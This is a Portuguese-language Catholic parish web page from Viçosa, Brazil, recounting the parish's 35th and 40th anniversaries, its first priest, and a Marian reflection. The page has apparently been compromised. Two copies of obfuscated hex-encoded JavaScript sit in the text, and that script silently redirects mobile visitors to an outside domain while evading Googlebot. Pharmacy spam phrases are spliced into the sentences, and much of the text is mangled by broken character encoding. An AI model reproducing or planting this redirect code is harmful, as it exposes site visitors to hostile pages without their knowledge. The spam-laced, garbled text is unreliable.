40 Anos da Paróquia de Nossa Senhora do Rosário de Fátima

No dia 13 de maio de 1975 o Arcebispo de Mariana Dom Oscar de Oliveira assinou o decreto de criação da Paróquia de Nossa Senhora do Rosário de Fátima em Viçosa. No dia 15 de junho de 1975 tomou posse o primeiro pároco, o saudoso Padre Geraldo Martins Paiva. Teve início a bela história da Paróquia que agora celebra os seus 40 anos de caminhada com Maria, a serva de Deus e da humanidade. São 40 anos de trabalho evangelizador! Desmembrada da Paróquia de Santa Rita de Cássia, a Paróquia de Fátima foi se organizando com a dedicação do Pe. Geraldo Paiva e a generosidade dos paroquianos, enquanto cresciam e se desenvolviam os bairros que a compõem. As comunidades foram se formando, os párocos, vigários paroquiais, diáconos, ministros e muitos leigos dedicados foram sucedendo-se no empenho para que se tornasse a paróquia feliz que é, na acolhida, celebração e vivência da Palavra de Deus.

Conforme a 9ª Assembleia Paroquial de Pastoral, realizada em dezembro de 2014, queremos ser sempre mais uma rede de comunidades de fé, esperança e caridade, com espírito missionário, constituindo a Comunidade Cristã como “Casa da Palavra, Casa do Pão e Casa da Caridade”. Que a Virgem Maria, Senhora de Fátima, nos ajude, com a sua oração e exemplo, a tornarmos Jesus Cristo sempre mais conhecido, amado e seguido, na edificação do Reino com a força do Espírito para a glória do Pai!

Cônego Lauro Sérgio Versiani Barbosa
Pároco

Relato Histórico da Paróquia de Fátima

chamada

Clique aqui para fazer o download de um documentário em fotos e legendas relatando alguns fatos importantes na história dos 40 anos da Paróquia Nossa Senhora de Fátima.


Documentários em depoimentos

Acompanhe abaixo um documentário rico em depoimentos, onde alguns paroquianos contam a história da Paróquia e como ela se confunde com a sua própria vida.

Maria: exemplo de confianA�a em Deus

generic depakote, generic clomid.

O mA?s de maio, com suas belezas, acaba sempre nos remetendo A� figura das mA?es e A� impossA�vel pensar nas mA?es sem relacionA?-las com a nossa querida mA?e do CA�u. Maria A� aquela que desde o inA�cio soube se colocar A� disposiA�A?o do outro, A� disposiA�A?o de Deus, entendendo que Ele sabe mais…

Com o seu sim diante do anjo, ela quis nos dar o exemplo e indicar o caminho. Mostrou que, embora nA?o entendesse o mistA�rio em que estava inserida, queria assumi-lo, pois Deus A� perfeito. Maria era uma jovenzinha, mas seu coraA�A?o era de uma mulher amadurecida… guerreira; com certeza, por causa de experiA?ncias jA? vividas com Deus em seu dia a dia.

A partir daquele sim, sua vida mudou totalmente. Tudo ganhou um novo sentido e pudemos perceber a forA�a da sua presenA�a intercessora, mostrada por SA?o Lucas no episA?dio das Bodas de CanA?, e tambA�m a sua presenA�a forte e materna diante da cruz ao ver o seu filho ser maltratado daquela forma e ainda assim permanecer de pA�.

Maria nA?o falava muito, nA?o fazia escA?ndalos; pelo contrA?rio, ficou conhecida por seu silA?ncio edificante. Ela falava nas horas certas e com sua postura forte e silenciosa deixava claro em quem estava depositada sua confianA�a.
A exemplo dela, temos tambA�m muitas mA?es em nosso dia a dia que tA?m buscado se espelhar nela. MA?es que, A�s vezes, passam por situaA�A�es dolorosas em suas casas, lutando com filhos com drogas, depressA?o e tantas outras doenA�as ou vA�cios, e no silA?ncio tA?m depositado a sua confianA�a em Deus.

Isso tudo nos mostra que nA?o podemos perder a esperanA�a nunca. Aqueles que confiam no Senhor nA?o sA?o desamparados. Prova disso A� o que Isabel disse A� Maria, pouco antes de ela entoar o canto do magnificat; ou seja, a�?Bem-aventurada A�s tu que creste, pois se hA?o de cumprir as coisas que da parte do Senhor te foram ditas!a�? Luc 1,45. Assim, tambA�m serA? conosco se confiarmos sempre em Deus e acreditarmos que Ele sempre sabe o que faz e o que permite.var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

Paróquia de Fátima completou 35 anos


Padre Geraldo, Dom Oscar e Padre Carlos

A Paróquia de Nossa Senhora do Rosário de Fátima, de Viçosa, completou no último dia 13, seus 35 anos. Instituída no paroquiato do Pe. Carlos dos Reis Baêta Braga, com o apoio de grandes líderes leigos como Antônio Lopes Fontes, Jacinto Teófilo de Paula, Paulo Lopes da Mota, João Lopes Fontes, Joaquim Firmino e Zezito de Barros, a Paróquia de Nossa Senhora, atualmente sob a direção do jovem e dinâmico Pe. Wander Torres Costa, teve como primeiro pároco o viçosense Pe. Geraldo Martins Paiva, nascido em 8/8/1925 e falecido a 26/8/2001. Ex-vigário cooperador entre 1959 e 1964 na Paróquia de Santa Rita, Pe. Geraldo Paiva foi sucedido primeiramente pelo Pe. Geraldo Francisco Leocádio, que completa 35 anos de ministério sacerdotal neste 2010, e depois pelo Pe. Tarcísio Sebastião Moreira. O terreno onde se encontra a Matriz de Fátima, na praça José Sant’Anna, foi doado pela família Fontes. Empossado ali a 15/6/1975, coube ao Pe. Geraldo Paiva a tarefa de liderar uma campanha gigantesca junto ao seu fiel rebanho para que fosse feita a terraplanagem da área onde, com armação feita de eucalipto e de bambu e revestimento de folhas de coqueiro, foi construída a primeira versão da Igreja Matriz, com 800m² de área útil para acolher mais de mil pessoas.

Simpatia, dedicação e capacidade de trabalho foram alguns dos atributos do Pe. Geraldo, na foto, com Pe. Carlos e Dom Oscar de Oliveira, na sagração da Igreja Matriz. A cronista Norah (Cirene Ferreira Alves) em seu livro Páginas para Serem Lembradas ressalta, dentre outros aspectos do saudoso sacerdote, o fato de ele só saber “distribuir bondade, compreensão, entendimento. Palavras medidas, e poucas, ouvidos abertos para as queixas, recursos vários para ajudar a alguém que esteja meio tonto no meio do caminho; mão estendida a quem dele solicitar e, às vezes, de pronto, até sem solicitação, ele se achega daquele que precisa, diz algumas poucas palavras sensatas, coloca ternamente a mão sobre a cabeça do indeciso, e seu ‘vai em paz, Deus está com você’, passa uma paz tão grande, dá uma certeza tamanha, que o indeciso sente a força divina, apruma a cabeça pendida, sorri para o amanhã, e acredita” […] Num bairro grande, afastado, construiu a Matriz de Nossa Senhora de Fátima, nome do bairro que ele tornou nobre, grande, conhecido, graças à força com que se empenhou em erguer uma Igreja, sem pompas, sem dourados, mas a Igreja da fé, da constante presença dos fiéis em busca do Padre que a todos acolhe com a mesma atenção, o mesmo carinho. Chegou ao Hospital São João Batista, por designação sábia de Dom Luciano, na condição de Capelão e que presença alentadora é a sua visita aos enfermos, seu carinho com os que trabalham; à missa rezada semanalmente acorrem os devotos de São João Batista, os amigos do Hospital, os pacientes, os familiares. Para todos, o mesmo padre simples tem uma palavra de alento, de amizade”.

Pároco de Jequeri, de Pedra do Anta e de Calambau, capelão em Viçosa do Patronato Agrícola, Colégio Normal e Hospital São Sebastião, Pe. Geraldo atuou em toda a dimensão pastoral além do soerguimento do templo físico. Fez-se a terraplanagem e em pouco tempo, com armação de eucalipto e bambu e revestimento de folhas de coqueiro, conforme já mencionado, estava erguida a primeira versão da Igreja de Nossa Senhora.

ParA?quia de FA?tima: 35 anos gerando vida, construindo o reino, anunciando as maravilhas do Senhor

ParA?quia de FA?tima: 35 anos gerando vida, construindo o reino, anunciando as maravilhas do Senhor

Aconteceu, no A?ltimo dia 13 de maio, na ParA?quia Nossa Senhora de FA?tima, ViA�osa- MG, a jA? tradicional Festa de sua Padroeira.

Neste ano de 2010, alA�m de ter sido celebrada por centenas de fiA�is esta data tA?o especial e marcante para toda a Igreja, foi tambA�m comemorado um marco na histA?ria da ParA?quia. Ou seja, o seu aniversA?rio de 35 anos.

A ParA?quia Nossa Senhora de FA?tima foi fundada em 1975 pelo entA?o pA?roco Pe Geraldo Martins Paiva e desde esta data tem como objetivo principal ser uma ponte para uma profunda experiA?ncia com Deus, alA�m de buscar dapoxetine online, lioresal online. atuar sempre a serviA�o da vida.

Como preparaA�A?o para esta grande festa, houve momentos de oraA�A?o nas comunidades, carreata pelas ruas da parA?quia, novena preparatA?ria nos dias que antecederam a festa. AlA�m disso, como jA? A� tradicional no mA?s de maio, houve a coraA�A?o de Nossa Sra de FA?tima pelas crianA�as e o Show cultural todos os dias depois da missa.

Especificamente no dia 13 de maio foi rezado ao longo de todo o dia na Igreja de FA?tima o santo rozA?rio e A�s 15 horas foi celebrada missa com unA�A?o aos doentes e idosos acima de 60 anos.

A noite do dia 13 de maio foi abrilhantada tambA�m pela banda Cantores de Deus, natural de SA?o Paulo, que, desde o ano de 1995, tem procurado evangelizar e levar o amor de Deus por meio de sua mA?sica.

De acordo com os promotores da festa um outro motivo tambA�m muito especial para a participaA�A?o de todos nesta grande festa foi o auxA�lio A� ParA?quia SA?o JoA?o Batista, jA? que todo dia dinheiro arrecadado nos dias nas barraquinhas foi doado para a construA�A?o de sua sede.

Em suma, foi uma belA�ssima festa! garantiram todos aqueles que estiveram lA? presentes e puderam participar de tudo.

var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}